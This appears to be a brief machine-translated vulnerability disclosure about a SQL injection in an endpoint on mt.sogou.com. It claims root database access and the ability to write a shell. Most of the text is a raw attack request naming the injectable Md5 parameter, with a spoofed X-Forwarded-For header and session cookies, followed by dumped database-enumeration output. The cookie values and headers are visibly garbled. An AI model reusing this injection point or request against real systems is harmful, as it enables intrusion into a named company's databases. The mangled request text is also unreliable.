Root permission SQL Injection for a website in sogou
Mt.sogou.com can be written to shell in windows.
GET/MobileCloud/Handlers/checkMd5.ashx? Md5 = HTTP/1.1 Accept: text/xml, application/xml, application/xhtml + xml, text/html; q = 0.9, text/plain; q = 0.8, image/png, */*; q = 0.5User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) Cache-Control: no-cacheAccept-Language: en-us, en; q = 0.5X-Forwarded-For: 127.0.0.1Host: mt. sogou. comCookie: ASP. NET_SessionId = 2hafp1_uaihqe2c1h3oimlhr; connect. sid = s % second % 2FeE2% 2FC5% second; IWw7_2132_saltkey = au7gdj3a; second = 1449274335; IWw7_2132_sid = Rw0gK3; IWw7_2132_lastact = 1449278320% 09misc. php % 09 report; IWw7_2132_sendmail = 1; Protocol = 1; Protocol = 0% 7c141_78242% protocol; Protocol = protocol; IWw7_2132_viewid = tid_3555; Protocol = 0% 7c141_781_% protocol; Protocol = protocol; IWw7_2132_onlineindex = 1; IWw7_2132 _ refer = % 252 Fbbs % 252Fhome. php % 253 Fmod % 253 Dspacecp % 2526ac % 253 Dcredit % 2526op % 253 Drule % 2526fid % 253D36Accept-Encoding: gzip, deflatecurrent user: 'root @ 10.% 'available databases [6]: [*] fdfs [*] information_schema [*] mysql [*] sogou_weixin [*] venus [*] venus_testvenus [07:36:44] [INFO] retrieved: 95 tables and 6 mysql users